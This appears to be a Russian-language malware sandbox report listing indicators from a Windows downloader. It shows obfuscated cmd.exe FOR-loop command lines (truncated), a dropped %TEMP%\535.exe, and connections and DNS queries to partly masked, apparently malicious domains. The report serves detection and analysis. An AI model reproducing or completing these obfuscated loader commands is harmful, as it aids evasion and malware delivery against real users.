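Техническая информация (в списке ниже доменные имена и URL частично скрыты символами «#», а длинные командные строки обрезаны многоточием)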
- '<SYSTEM32>\cmd.exe' /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT...
- %TEMP%\535.exe
- %TEMP%\535.exe
- 'ha###nscs.com':80
- 'hy#####rbonreports.com':80
- 'hy#####rbonreports.com':443
- 'aj##.com':80
- 'ex#####freeresults.com':80
- http://hy#####rbonreports.com/0
- http://aj##.com/akDJlHl
- http://www.ex#####freeresults.com/?dn###############################
- 'hy#####rbonreports.com':443
- DNS ASK ha###nscs.com
- DNS ASK hy#####rbonreports.com
- DNS ASK gr####isionpr.com
- DNS ASK aj##.com
- DNS ASK ex#####freeresults.com
- DNS ASK ka###.zendo.in.ua
- '<SYSTEM32>\cmd.exe' /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ^FT^yPe | FIN^d^S^Tr d^f^i
- '<SYSTEM32>\cmd.exe' /S /D /c" FTyPe "
- '<SYSTEM32>\findstr.exe' dfi
- '<SYSTEM32>\cmd.exe' ; , yr2eOFUzM/Vj]Nj~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^...